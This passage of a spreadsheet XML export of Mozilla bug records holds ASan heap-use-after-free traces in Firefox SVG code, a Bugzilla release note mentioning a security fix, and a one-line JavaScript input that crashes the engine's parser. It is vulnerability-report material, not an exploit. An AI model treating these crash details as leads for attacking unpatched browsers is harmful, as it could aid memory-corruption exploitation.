    #19 0x7f63a26935d9 in mozilla::SVGTextFrame::DoReflow() /builds/worker/checkouts/gecko/layout/svg/SVGTextFrame.cpp:5118:8
    #20 0x7f63a26835de in mozilla::SVGTextFrame::MaybeReflowAnonymousBlockChild() /builds/worker/checkouts/gecko/layout/svg/SVGTextFrame.cpp:5059:5
    #21 0x7f63a265f6b8 in mozilla::SVGTextFrame::ReflowSVG() /builds/worker/checkouts/gecko/layout/svg/SVGTextFrame.cpp:3294:3
    #22 0x7f63a262a3cf in mozilla::SVGDisplayContainerFrame::ReflowSVG() /builds/worker/checkouts/gecko/layout/svg/SVGContainerFrame.cpp:320:17
    #23 0x7f63a26964ed in mozilla::SVGUseFrame::ReflowSVG() /builds/worker/checkouts/gecko/layout/svg/SVGUseFrame.cpp:114:14
    #24 0x7f63a262a3cf in mozilla::SVGDisplayContainerFrame::ReflowSVG() /builds/worker/checkouts/gecko/layout/svg/SVGContainerFrame.cpp:320:17
    #25 0x7f63a266ad5e in mozilla::SVGOuterSVGFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /builds/worker/checkouts/gecko/layout/svg/SVGOuterSVGFrame.cpp:453:14
    #26 0x7f63a20b4389 in mozilla::PresShell::DoReflow(nsIFrame*, bool, mozilla::OverflowChangedTracker*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:9630:11
    #27 0x7f63a20c6037 in mozilla::PresShell::ProcessReflowCommands(bool) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:9801:24
    #28 0x7f63a20c4769 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:4277:11
    #29 0x7f63a20549e7 in FlushPendingNotifications /builds/worker/workspace/obj-build/dist/include/mozilla/PresShell.h:1409:5
    #30 0x7f63a20549e7 in nsRefreshDriver::Tick(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:2221:20
    #31 0x7f63a2060c75 in TickDriver /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:347:13
    #32 0x7f63a2060c75 in mozilla::RefreshDriverTimer::TickRefreshDrivers(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:325:7
    #33 0x7f63a20609dd in mozilla::RefreshDriverTimer::Tick(mozilla::layers::BaseTransactionId&lt;mozilla::VsyncIdType&gt;, mozilla::TimeStamp) /builds/worker/checkouts/gecko/layout/base/nsRefreshDriver.cpp:341:5
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:286:27 in get
Shadow bytes around the buggy address:
  0x0c28800a3400: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c28800a3410: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c28800a3420: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c28800a3430: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c28800a3440: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=&gt;0x0c28800a3450: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c28800a3460: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c28800a3470: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
  0x0c28800a3480: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c28800a3490: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c28800a34a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1163767==ABORTING
```</t>
        </is>
      </c>
      <c r="X5898" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5899">
      <c r="A5899" t="n">
        <v>463048</v>
      </c>
      <c r="B5899" t="inlineStr">
        <is>
          <t>2008-11-04 08:11:06 -0800</t>
        </is>
      </c>
      <c r="C5899" t="inlineStr">
        <is>
          <t>Release Bugzilla 3.2rc2, 3.0.6, 2.22.6, and 2.20.7</t>
        </is>
      </c>
      <c r="D5899" t="inlineStr">
        <is>
          <t>2008-12-26 01:09:43 -0800</t>
        </is>
      </c>
      <c r="E5899" t="n">
        <v>1</v>
      </c>
      <c r="F5899" t="n">
        <v>1</v>
      </c>
      <c r="G5899" t="n">
        <v>4</v>
      </c>
      <c r="H5899" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5899" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5899" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5899" t="inlineStr">
        <is>
          <t>3.2</t>
        </is>
      </c>
      <c r="L5899" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5899" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5899" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5899" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5899" t="inlineStr"/>
      <c r="Q5899" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5899" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5899" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5899" t="n">
        <v>1</v>
      </c>
      <c r="U5899" t="n">
        <v>0</v>
      </c>
      <c r="V5899" t="n">
        <v>17</v>
      </c>
      <c r="W5899" t="inlineStr">
        <is>
          <t>The list of blockers is pretty small now and the remaining blockers should be fixed soon:
 https://bugzilla.mozilla.org/buglist.cgi?quicksearch=flag%3Ablocking3.2%2B
Also, QA is doing some progress and we can expect some new Selenium tests in the near future; see progress at:
 http://landfill.bugzilla.org/bugzillaqa/showdependencygraph.cgi?id=3065
and:
 http://landfill.bugzilla.org/bugzillaqa/showdependencygraph.cgi?id=3130
We have a security bug ready for checkin (bug 449931), which affects all supported branches, so we also have to release 3.0.6, 2.22.6 and 2.20.7. Per my last discussion with mkanat, he doesn't plan to release 3.3.1 yet, which will let us focus on 3.2 final.</t>
        </is>
      </c>
      <c r="X5899" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5900">
      <c r="A5900" t="n">
        <v>786895</v>
      </c>
      <c r="B5900" t="inlineStr">
        <is>
          <t>2012-08-29 18:07:13 -0700</t>
        </is>
      </c>
      <c r="C5900" t="inlineStr">
        <is>
          <t>Heap-use-after-free in DOMSVGTests::GetRequiredFeatures</t>
        </is>
      </c>
      <c r="D5900" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:45 -0700</t>
        </is>
      </c>
      <c r="E5900" t="n">
        <v>1</v>
      </c>
      <c r="F5900" t="n">
        <v>1</v>
      </c>
      <c r="G5900" t="n">
        <v>3</v>
      </c>
      <c r="H5900" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5900" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5900" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5900" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5900" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5900" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5900" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5900" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5900" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5900" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5900" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5900" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5900" t="n">
        <v>1</v>
      </c>
      <c r="U5900" t="n">
        <v>0</v>
      </c>
      <c r="V5900" t="n">
        <v>19</v>
      </c>
      <c r="W5900" t="inlineStr">
        <is>
          <t>Reproduces on trunk. Don't have reliable testcase, but this is hitting every now and then. I got it once under a fully symbolized build that might give an idea of the problem. As i get the reliable testcase, i will attach it soon. This hits in both DOMSVGTests::GetRequiredFeatures and DOMSVGTests::GetRequiredExtensions.
=================================================================
==1718== ERROR: AddressSanitizer heap-use-after-free on address 0x7f6583c87f88 at pc 0x7f65b68c2506 bp 0x7fff5fd7bf90 sp 0x7fff5fd7bf88
READ of size 8 at 0x7f6583c87f88 thread T0
    #0 0x7f65b68c2505 in nsCycleCollectingAutoRefCnt::incr(void*) src/../../../dist/include/nsISupportsImpl.h:108
    #1 0x7f65bcddcdec in mozilla::DOMSVGStringList::AddRef() src/content/svg/content/src/DOMSVGStringList.cpp:21
    #2 0x7f65bcde89d6 in nsRefPtr src/../../../../dist/include/nsAutoPtr.h:898
    #3 0x7f65bcddea07 in nsRefPtr src/../../../../dist/include/nsAutoPtr.h:899
    #4 0x7f65bcdde502 in mozilla::DOMSVGStringList::GetDOMWrapper(mozilla::SVGStringList*, nsSVGElement*, bool, unsigned char) src/content/svg/content/src/DOMSVGStringList.cpp:43
    #5 0x7f65bcdeb3d1 in DOMSVGTests::GetRequiredFeatures(nsIDOMSVGStringList**) src/content/svg/content/src/DOMSVGTests.cpp:33
    #6 0x7f65c25d50e7 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #7 0x7f65bda32bde in CallMethodHelper::Invoke() src/js/xpconnect/src/XPCWrappedNative.cpp:3105
    #8 0x7f65bda99a67 in XPCWrappedNative::GetAttribute(XPCCallContext&amp;) src/js/xpconnect/src/xpcprivate.h:2817
    #9 0x7f65bda98e8c in XPC_WN_GetterSetter(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1518
    #10 0x7f65c8ba6501 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:372
    #11 0x7f65c843d6dc in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:119
    #12 0x7f65c8babebb in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:388
    #13 0x7f65c8bb2910 in js::InvokeGetterOrSetter(JSContext*, JSObject*, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:461
    #14 0x7f65c8eb4372 in js::Shape::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JSObject*, JSObject*, JS::MutableHandle&lt;JS::Value&gt;) src/js/src/jsscopeinlines.h:296
    #15 0x7f65c8e56c4e in js_NativeGetInline(JSContext*, JS::Handle&lt;JSObject*&gt;, JSObject*, JSObject*, js::Shape*, unsigned int, JS::Value*) src/js/src/jsobj.cpp:4461
    #16 0x7f65c82bed14 in JSObject::getGeneric(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, JS::MutableHandle&lt;JS::Value&gt;) src/js/src/jsobjinlines.h:173
    #17 0x7f65c828f65b in JSObject::getProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, js::PropertyName*, JS::MutableHandle&lt;JS::Value&gt;) src/js/src/jsobjinlines.h:184
    #18 0x7f65c8b2cd71 in js::GetObjectElementOperation(JSContext*, JSOp, JS::Handle&lt;JSObject*&gt;, JS::Value const&amp;, JS::MutableHandle&lt;JS::Value&gt;) src/js/src/jsinterpinlines.h:713
    #19 0x7f65c8a9a772 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:301
    #20 0x7f65c8bb3836 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:486
    #21 0x7f65c8bb57ee in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:523
    #22 0x7f65c830d5f4 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5673
    #23 0x7f65baba9ffd in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1499
    #24 0x7f65bad59e4f in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) src/dom/base/nsGlobalWindow.cpp:9590
    #25 0x7f65bad117c9 in nsGlobalWindow::RunTimeout(nsTimeout*) src/dom/base/nsGlobalWindow.cpp:9851
    #26 0x7f65bad57eaa in nsGlobalWindow::TimerCallback(nsITimer*, void*) src/dom/base/nsGlobalWindow.cpp:10118
    #27 0x7f65c25173e2 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:473
    #28 0x7f65c2518c98 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #29 0x7f65c24dc08e in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #30 0x7f65c217d4f7 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #31 0x7f65c0f57df5 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #32 0x7f65c2786c69 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #33 0x7f65c2786ab2 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #34 0x7f65c2786997 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #35 0x7f65c04213be in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #36 0x7f65bf085608 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:273
    #37 0x7f65b5863ae0 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3835
    #38 0x7f65b5869d54 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3912
    #39 0x7f65b586ce1e in XRE_main src/toolkit/xre/nsAppRunner.cpp:3988
    #40 0x40c5bb in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #41 0x409e1f in main src/browser/app/nsBrowserApp.cpp:279
    #42 0x7f65d2368c4d in ?? ??:0
0x7f6583c87f88 is located 8 bytes inside of 32-byte region [0x7f6583c87f80,0x7f6583c87fa0)
freed by thread T0 here:
    #0 0x4c3e30 in free ??:0
    #1 0x7f65cf206572 in moz_free src/memory/mozalloc/mozalloc.cpp:51
    #2 0x7f65bcddd248 in operator delete(void*) src/../../../../dist/include/mozilla/mozalloc.h:224
    #3 0x7f65bd8eadc5 in _ZL17DoDeferredReleaseIP11nsISupportsEvR8nsTArrayIT_24nsTArrayDefaultAllocatorE src/js/xpconnect/src/XPCJSRuntime.cpp:564
    #4 0x7f65bd8ea578 in XPCJSRuntime::GCCallback(JSRuntime*, JSGCStatus) src/js/xpconnect/src/XPCJSRuntime.cpp:718
    #5 0x7f65c88b7b0e in Collect(JSRuntime*, bool, long, js::JSGCInvocationKind, js::gcreason::Reason) src/js/src/jsgc.cpp:4505
    #6 0x7f65c88b83b6 in js::GCFinalSlice(JSRuntime*, js::JSGCInvocationKind, js::gcreason::Reason) src/js/src/jsgc.cpp:4544
    #7 0x7f65c88049e8 in js::FinishIncrementalGC(JSRuntime*, js::gcreason::Reason) src/js/src/jsfriendapi.cpp:177
    #8 0x7f65c825d7a3 in JS_TransplantObject src/js/src/jsapi.cpp:1570
    #9 0x7f65bea486f5 in xpc::TransplantObject(JSContext*, JSObject*, JSObject*) src/js/xpconnect/wrappers/WrapperFactory.cpp:674
    #10 0x7f65bda1648e in XPCWrappedNative::ReparentWrapperIfFound(XPCCallContext&amp;, XPCWrappedNativeScope*, XPCWrappedNativeScope*, JSObject*, nsISupports*, XPCWrappedNative**) src/js/xpconnect/src/XPCWrappedNative.cpp:1669
    #11 0x7f65bd69955d in nsXPConnect::ReparentWrappedNativeIfFound(JSContext*, JSObject*, JSObject*, nsISupports*, nsIXPConnectJSObjectHolder**) src/js/xpconnect/src/nsXPConnect.cpp:1531
    #12 0x7f65b8dce9b8 in nsNodeUtils::CloneAndAdopt(nsINode*, bool, bool, nsNodeInfoManager*, JSContext*, JSObject*, nsCOMArray&lt;nsINode&gt;&amp;, nsINode*, nsINode**) src/content/base/src/nsNodeUtils.cpp:537
    #13 0x7f65b8bc3c9f in nsNodeUtils::CloneAndAdopt(nsINode*, bool, bool, nsNodeInfoManager*, JSContext*, JSObject*, nsCOMArray&lt;nsINode&gt;&amp;, nsIDOMNode**) src/../../../../dist/include/nsNodeUtils.h:282
    #14 0x7f65b8afdd38 in nsNodeUtils::Adopt(nsINode*, nsNodeInfoManager*, JSContext*, JSObject*, nsCOMArray&lt;nsINode&gt;&amp;) src/content/base/src/nsNodeUtils.h:182
    #15 0x7f65b8af942c in nsDocument::AdoptNode(nsIDOMNode*, nsIDOMNode**) src/content/base/src/nsDocument.cpp:6169
    #16 0x7f65ba424360 in nsHTMLDocument::AdoptNode(nsIDOMNode*, nsIDOMNode**) src/content/html/document/src/nsHTMLDocument.h:87
    #17 0x7f65ba42a366 in non-virtual thunk to nsHTMLDocument::AdoptNode(nsIDOMNode*, nsIDOMNode**) src/gfx/cairo/cairo/src/cairo-surface-subsurface.c:0
    #18 0x7f65b8d2f657 in AdoptNodeIntoOwnerDoc(nsINode*, nsINode*) src/content/base/src/nsINode.cpp:1257
    #19 0x7f65b8d34540 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*) src/content/base/src/nsINode.cpp:1809
    #20 0x7f65b8f11881 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, unsigned int*) src/../../../dist/include/nsINode.h:1464
    #21 0x7f65b8f0f948 in nsINode::InsertBefore(nsINode*, nsINode*, unsigned int*) src/../../../dist/include/nsINode.h:488
    #22 0x7f65b9afb20a in nsINode::AppendChild(nsINode*, unsigned int*) src/../../../dist/include/nsINode.h:498
    #23 0x7f65bdbe8437 in nsIDOMNode_AppendChild(JSContext*, unsigned int, JS::Value*) src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:5531
    #24 0x7f65c8ba6501 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:372
    #25 0x7f65c8b33731 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2405
    #26 0x7f65c8a9a772 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:301
    #27 0x7f65c8bb3836 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:486
    #28 0x7f65c8bb57ee in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:523
    #29 0x7f65c830d5f5 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5673
previously allocated by thread T0 here:
    #0 0x4c3ef0 in __interceptor_malloc ??:0
    #1 0x7f65cf2066c6 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:57
    #2 0x7f65bcdde56d in operator new(unsigned long) src/../../../../dist/include/mozilla/mozalloc.h:200
    #3 0x7f65bcdeb3d1 in DOMSVGTests::GetRequiredFeatures(nsIDOMSVGStringList**) src/content/svg/content/src/DOMSVGTests.cpp:33
    #4 0x7f65c25d50e7 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #5 0x7f65bda32bde in CallMethodHelper::Invoke() src/js/xpconnect/src/XPCWrappedNative.cpp:3105
    #6 0x7f65bda99a67 in XPCWrappedNative::GetAttribute(XPCCallContext&amp;) src/js/xpconnect/src/xpcprivate.h:2817
    #7 0x7f65bda98e8c in XPC_WN_GetterSetter(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1518
    #8 0x7f65c8ba6501 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:372
    #9 0x7f65c843d6dc in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:119
    #10 0x7f65c8babebb in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:388
    #11 0x7f65c8bb2910 in js::InvokeGetterOrSetter(JSContext*, JSObject*, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:461
    #12 0x7f65c8eb4372 in js::Shape::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JSObject*, JSObject*, JS::MutableHandle&lt;JS::Value&gt;) src/js/src/jsscopeinlines.h:296
    #13 0x7f65c8e56c4e in js_NativeGetInline(JSContext*, JS::Handle&lt;JSObject*&gt;, JSObject*, JSObject*, js::Shape*, unsigned int, JS::Value*) src/js/src/jsobj.cpp:4461
    #14 0x7f65c82bed14 in JSObject::getGeneric(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, JS::MutableHandle&lt;JS::Value&gt;) src/js/src/jsobjinlines.h:173
    #15 0x7f65c828f65b in JSObject::getProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, js::PropertyName*, JS::MutableHandle&lt;JS::Value&gt;) src/js/src/jsobjinlines.h:184
    #16 0x7f65c8b2cd71 in js::GetObjectElementOperation(JSContext*, JSOp, JS::Handle&lt;JSObject*&gt;, JS::Value const&amp;, JS::MutableHandle&lt;JS::Value&gt;) src/js/src/jsinterpinlines.h:713
    #17 0x7f65c8a9a772 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:301
    #18 0x7f65c8bb3836 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:486
    #19 0x7f65c8bb57ee in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:523
    #20 0x7f65c830d5f4 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5673
    #21 0x7f65baba9ffd in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1499
    #22 0x7f65bad59e4f in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) src/dom/base/nsGlobalWindow.cpp:9590
    #23 0x7f65bad117c9 in nsGlobalWindow::RunTimeout(nsTimeout*) src/dom/base/nsGlobalWindow.cpp:9851
    #24 0x7f65bad57eab in nsGlobalWindow::TimerCallback(nsITimer*, void*) src/dom/base/nsGlobalWindow.cpp:10119
Shadow byte and word:
  0x1fecb0790ff1: fd
  0x1fecb0790ff0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fecb0790fd0: 00 00 00 00 00 00 00 00
  0x1fecb0790fd8: 00 00 00 fb fb fb fb fb
  0x1fecb0790fe0: fa fa fa fa fa fa fa fa
  0x1fecb0790fe8: fa fa fa fa fa fa fa fa
=&gt;0x1fecb0790ff0: fd fd fd fd fd fd fd fd
  0x1fecb0790ff8: fd fd fd fd fd fd fd fd
  0x1fecb0791000: fa fa fa fa fa fa fa fa
  0x1fecb0791008: fa fa fa fa fa fa fa fa
  0x1fecb0791010: 00 00 00 00 fb fb fb fb
Stats: 250M malloced (286M for red zones) by 749048 calls
Stats: 117M realloced by 28773 calls
Stats: 218M freed by 507760 calls
Stats: 83M really freed by 211442 calls
Stats: 484M (123977 full pages) mmaped in 121 calls
  mmaps   by size class: 8:557022; 9:40955; 10:16380; 11:10235; 12:3072; 13:2048; 14:768; 15:256; 16:576; 17:224; 18:288; 19:208; 20:4;
  mallocs by size class: 8:677534; 9:36702; 10:14422; 11:12268; 12:3345; 13:2207; 14:878; 15:297; 16:587; 17:251; 18:343; 19:210; 20:4;
  frees   by size class: 8:455111; 9:26721; 10:10654; 11:8924; 12:2273; 13:1923; 14:605; 15:266; 16:519; 17:241; 18:316; 19:205; 20:2;
  rfrees  by size class: 8:174168; 9:20742; 10:7805; 11:4812; 12:1489; 13:1110; 14:416; 15:139; 16:471; 17:142; 18:142; 19:4; 20:2;
Stats: malloc large: 808 small slow: 2574
==1718== ABORTING</t>
        </is>
      </c>
      <c r="X5900" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5901">
      <c r="A5901" t="n">
        <v>346203</v>
      </c>
      <c r="B5901" t="inlineStr">
        <is>
          <t>2006-07-27 16:42:44 -0700</t>
        </is>
      </c>
      <c r="C5901" t="inlineStr">
        <is>
          <t>destructuring assignment |var {b:{c:x}}={b:{c:1}}| crashes [@ FindPropertyValue]</t>
        </is>
      </c>
      <c r="D5901" t="inlineStr">
        <is>
          <t>2011-06-09 14:58:44 -0700</t>
        </is>
      </c>
      <c r="E5901" t="n">
        <v>1</v>
      </c>
      <c r="F5901" t="n">
        <v>1</v>
      </c>
      <c r="G5901" t="n">
        <v>3</v>
      </c>
      <c r="H5901" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5901" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5901" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5901" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5901" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5901" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5901" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5901" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5901" t="inlineStr"/>
      <c r="Q5901" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5901" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5901" t="inlineStr">
        <is>
          <t>mozilla1.8.1beta2</t>
        </is>
      </c>
      <c r="T5901" t="n">
        <v>1</v>
      </c>
      <c r="U5901" t="n">
        <v>0</v>
      </c>
      <c r="V5901" t="n">
        <v>6</v>
      </c>
      <c r="W5901" t="inlineStr">
        <is>
          <t>Running var {b:{c:x}}={b:{c:1}} in xpcshell crashes a recent trunk build:
FindPropertyValue(pn=0x03711580, pnid=0x03711440, data=0x0012eb44)  Line 1805
CheckDestructuring(cx=0x0364acc0, args=0x0012ebc4, left=0x03711418, right=0x03711580, tc=0x0012ece4)  Line 1894
Variables(cx=0x0364acc0, ts=0x03711070, tc=0x0012ece4)  Line 3220
Statement(cx=0x0364acc0, ts=0x03711070, tc=0x0012ece4)  Line 2896
Statements(cx=0x0364acc0, ts=0x03711070, tc=0x0012ece4)  Line 1131
js_ParseTokenStream(cx=0x0364acc0, chain=0x03756e10, ts=0x03711070)  Line 451
JS_BufferIsCompilableUnit(cx=0x0364acc0, obj=0x03756e10, bytes=0x0012eddc, length=0x00000018)  Line 3935
ProcessFile(cx=0x0364acc0, obj=0x03756e10, filename=0x00000000, file=0x10310bd0, forceTTY=0x00000000)  Line 624
Process(cx=0x0364acc0, obj=0x03756e10, filename=0x00000000, forceTTY=0x00000000)  Line 674
ProcessArgs(cx=0x0364acc0, obj=0x03756e10, argv=0x003f7064, argc=0x00000000)  Line 829
main(argc=0x00000000, argv=0x003f7064, envp=0x003f2dd0)  Line 1103</t>
        </is>
      </c>
      <c r="X5901" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5902">
      <c r="A5902" t="n">
        <v>432487</v>
      </c>
      <c r="B5902" t="inlineStr">
        <is>
          <t>2008-05-06 12:32:18 -0700</t>
        </is>
      </c>
      <c r="C5902" t="inlineStr">
        <is>
          <t>IL should be shared between multiple MethodEnv's of the same Function</t>
        </is>
      </c>
      <c r="D5902" t="inlineStr">
        <is>
          <t>2008-06-26 13:08:35 -0700</t>
        </is>
      </c>
      <c r="E5902" t="n">
        <v>1</v>
      </c>
      <c r="F5902" t="n">
        <v>1</v>
      </c>
      <c r="G5902" t="n">
        <v>6</v>
      </c>
      <c r="H5902" t="inlineStr">
        <is>
